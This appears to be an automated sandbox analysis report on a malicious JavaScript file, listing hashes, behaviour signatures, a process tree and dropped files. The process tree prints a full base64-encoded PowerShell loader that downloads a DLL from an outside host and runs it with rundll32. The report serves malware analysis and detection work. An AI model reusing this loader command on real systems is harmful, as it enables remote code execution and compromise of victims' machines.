Analysis

  • max time kernel
    147s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-10-2023 08:02

General

  • Target

    RE_432-7784.js

  • Size

    5.3MB

  • MD5

    bd6e5c0e5b943bfe471d226126324b07

  • SHA1

    081aa5ebe5401e12629a58e0cb6a11cbd552d365

  • SHA256

    b3aa3441c6911e0150547ba2519f9e97b76e52080ab8b9ab793061e6aadb386b

  • SHA512

    7a70225786e38af457c879987d3c31bad5a32384e4dd4e9bb7748762863b541a0524603f7d0425d960cea17b9f9c6aa63ed8c2bfce1045df47090cf7f2e81447

  • SSDEEP

    49152:ZHoFXu989gdRkFS7lCpPktyIpEjqYczjQFa1iT4ea0AE6+axSz3rlq303ZM02QA1:3

Score
7/10

Malware Config

Signatures

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious behavior: EnumeratesProcesses 13 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of FindShellTrayWindow 25 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\RE_432-7784.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:1724
    • C:\Windows\explorer.exe
      "C:\Windows\explorer.exe" https://reutersinstitute.politics.ox.ac.uk/sites/default/files/2022-06/Digital_News-Report_2022.pdf
      2⤵
        PID:3088
      • C:\ProgramData\AlphaPath\appRunner.exe
        "C:\ProgramData\AlphaPath\appRunner.exe" -nop -Ep BYPass -WiN HId -eNc ZnVuY3Rpb24gQSgkcCwgcyl7CiAgICAkZCA9IEpvaW4tUGF0aCAkcCAkcyAKICAgIHJldHVybiAkZAoKfQoKZnVuY3Rpb24gQigkdSwgJHApewogICAgSW52b2tlLVdlYlJlcXVlc3QgLVBvc3QgLXVyaSAkdSAtT3V0RmlsZSAkcCAKfQoKZnVuY3Rpb24gQygkYyl7IAogICAgaWV4ICRjCn0KCgokdTEgPSAiaHR0cHM6Ly9wbGF3ZXJzLmNvbS9UT0EvIgokdTJgID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOEdldFN0cmluZyhbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCJFRktrZWZrZWZzPSIpKQokdXJsID0gJHUxK2AkdTIKCiRkMSA9ICJDOlxQcm9ncmFtRGF0YVwiCiRkMiA9ICJCb3RhUGF0aCIKJGZvbGRlciA9IEEgJGQxICRkMgoKJGYgPSAiZG9ub3QuZGxsIgokZnVsbFBhdGggPSBBICRmb2xkZXIgJGYKCgokY21kMSA9ICJydW5kbGwyIDMiCiRjbWQyID0gIiwgSFVFX2luY192YXIiCiRydW5Db21tYW5kID0gJGNtZDEgKyAkZnVsbFBhdGggKyAkY21kMgoKQiAkdXJsICRmdWxsUGF0aAogQyAkcnVuQ29tbWFuZAo=
        2⤵
        • Executes dropped EXE
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4464
    • C:\Windows\explorer.exe
      C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:5048
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://reutersinstitute.politics.ox.ac.uk/sites/default/files/2022-06/Digital_News-Report_2022.pdf
        2⤵
        • Enumerates system info in registry
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:1480
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffc79e446f8,0x7ffc79e44708,0x7ffc79e44718
          3⤵
            PID:5000
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,9234660400348736341,7514415555712974365,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2240 /prefetch:2
            3⤵
              PID:4988
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2156,9234660400348736341,7514415555712974365,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2316 /prefetch:3
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              PID:4996
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2156,9234660400348736341,7514415555712974365,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2760 /prefetch:8
              3⤵
                PID:1240
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9234660400348736341,7514415555712974365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3612 /prefetch:1
                3⤵
                  PID:1868
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9234660400348736341,7514415555712974365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3608 /prefetch:1
                  3⤵
                    PID:1284
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9234660400348736341,7514415555712974365,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5052 /prefetch:1
                    3⤵
                      PID:4708
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=2156,9234660400348736341,7514415555712974365,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=4884 /prefetch:6
                      3⤵
                        PID:4176
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9234660400348736341,7514415555712974365,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4876 /prefetch:1
                        3⤵
                          PID:4616
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9234660400348736341,7514415555712974365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4892 /prefetch:1
                          3⤵
                            PID:2832
                          • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,9234660400348736341,7514415555712974365,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6192 /prefetch:8
                            3⤵
                              PID:3724
                            • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2156,9234660400348736341,7514415555712974365,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6192 /prefetch:8
                              3⤵
                              • Suspicious behavior: EnumeratesProcesses
                              PID:4528
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9234660400348736341,7514415555712974365,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:1
                              3⤵
                                PID:3284
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2156,9234660400348736341,7514415555712974365,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6024 /prefetch:1
                                3⤵
                                  PID:2952
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2156,9234660400348736341,7514415555712974365,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1952 /prefetch:2
                                  3⤵
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:4716
                            • C:\Windows\System32\CompPkgSrv.exe
                              C:\Windows\System32\CompPkgSrv.exe -Embedding
                              1⤵
                                PID:1228
                              • C:\Windows\System32\CompPkgSrv.exe
                                C:\Windows\System32\CompPkgSrv.exe -Embedding
                                1⤵
                                  PID:1128

                                Network

                                MITRE ATT&CK Enterprise v15

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\ProgramData\AlphaPath\appRunner.exe

                                  Filesize

                                  442KB

                                  MD5

                                  04029e121a0cfa5991749937dd22a1d9

                                  SHA1

                                  f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                  SHA256

                                  9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                  SHA512

                                  6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                • C:\ProgramData\AlphaPath\appRunner.exe

                                  Filesize

                                  442KB

                                  MD5

                                  04029e121a0cfa5991749937dd22a1d9

                                  SHA1

                                  f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

                                  SHA256

                                  9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

                                  SHA512

                                  6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                  Filesize

                                  152B

                                  MD5

                                  4d25fc6e43a16159ebfd161f28e16ef7

                                  SHA1

                                  49941a4bc3ed1ef90c7bcf1a8f0731c6a68facb4

                                  SHA256

                                  cee74fad9d775323a5843d9e55c770314e8b58ec08653c7b2ce8e8049df42bb5

                                  SHA512

                                  ea598fb8bfe15c777daeb025da98674fe8652f7341e5d150d188c46744fce11c4d20d1686d185039c5025c9a4252d1585686b1c3a4df4252e69675aaf37edfc1

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

                                  Filesize

                                  111B

                                  MD5

                                  285252a2f6327d41eab203dc2f402c67

                                  SHA1

                                  acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

                                  SHA256

                                  5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

                                  SHA512

                                  11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                  Filesize

                                  5KB

                                  MD5

                                  915a486b2e722c489766a7106ed00f88

                                  SHA1

                                  cb8f06b3adacf6b7d472b0ca4f40b98f129e4045

                                  SHA256

                                  2ebf5460af685d9d98e9fe67317bfe3fccbcd2ce2dfb3dc9717a5d3ae3ec3f57

                                  SHA512

                                  b91dd705ba479b7e4792fe1bcd28f2388cc0acab9dcc947e3cd5a8d46e3a63fdccbdec090016406e8d6bac66752b0a973fae9661bf53ded09ce415a932f583a4

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                  Filesize

                                  5KB

                                  MD5

                                  6ed5317b7852bf4c2c1686276ea53bc0

                                  SHA1

                                  b356c9db5a9872736c4e31ef7431ecf8941b5983

                                  SHA256

                                  a930c1fd8ad8b42e00d4c922dcaf4f0edac28a2688dc61c176fc5cdf350fca69

                                  SHA512

                                  1ca6fcf77f81abed37af775d767fc8b96ee644401e6ccaab0a10c866c2a09320f66b8570dfdf857b07eef3de36e3e4f4df9ec32d0ac45facc6840a41f3d7a994

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                  Filesize

                                  24KB

                                  MD5

                                  d555d038867542dfb2fb0575a0d3174e

                                  SHA1

                                  1a5868d6df0b5de26cf3fc7310b628ce0a3726f0

                                  SHA256

                                  044cac379dddf0c21b8e7ee4079d21c67e28795d14e678dbf3e35900f25a1e2e

                                  SHA512

                                  d8220966fe6c3ae4499bc95ab3aead087a3dd915853320648849d2fc123a4acd157b7dba64af0108802522575a822651ecc005523c731423d9131ee679c2712f

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

                                  Filesize

                                  16B

                                  MD5

                                  6752a1d65b201c13b62ea44016eb221f

                                  SHA1

                                  58ecf154d01a62233ed7fb494ace3c3d4ffce08b

                                  SHA256

                                  0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

                                  SHA512

                                  9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

                                • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                  Filesize

                                  10KB

                                  MD5

                                  b151b159617ba193a6050c2410e70e35

                                  SHA1

                                  4974a3d8321300b1571dfc65ac552ac3be607295

                                  SHA256

                                  252468852e27f141dc819e32161bab7d718a4fec6578b88b4c0abfd09999bc00

                                  SHA512

                                  2bfd27436a926f29f210994619ea2172f0bce142d61dd7a44fe5fc8639643d618390ae0bb180b084401f38e750fd9e6b964dbc2e87b0d7e66e3e55be8cf33d97

                                • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_wspydjzr.lqm.ps1

                                  Filesize

                                  60B

                                  MD5

                                  d17fe0a3f47be24a6453e9ef58c94641

                                  SHA1

                                  6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                  SHA256

                                  96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                  SHA512

                                  5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                • memory/4464-56-0x000002C047580000-0x000002C047590000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/4464-64-0x00007FFC77460000-0x00007FFC77F21000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4464-59-0x000002C047580000-0x000002C047590000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/4464-58-0x000002C047580000-0x000002C047590000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/4464-57-0x000002C047580000-0x000002C047590000-memory.dmp

                                  Filesize

                                  64KB

                                • memory/4464-55-0x00007FFC77460000-0x00007FFC77F21000-memory.dmp

                                  Filesize

                                  10.8MB

                                • memory/4464-45-0x000002C0476C0000-0x000002C0476E2000-memory.dmp

                                  Filesize

                                  136KB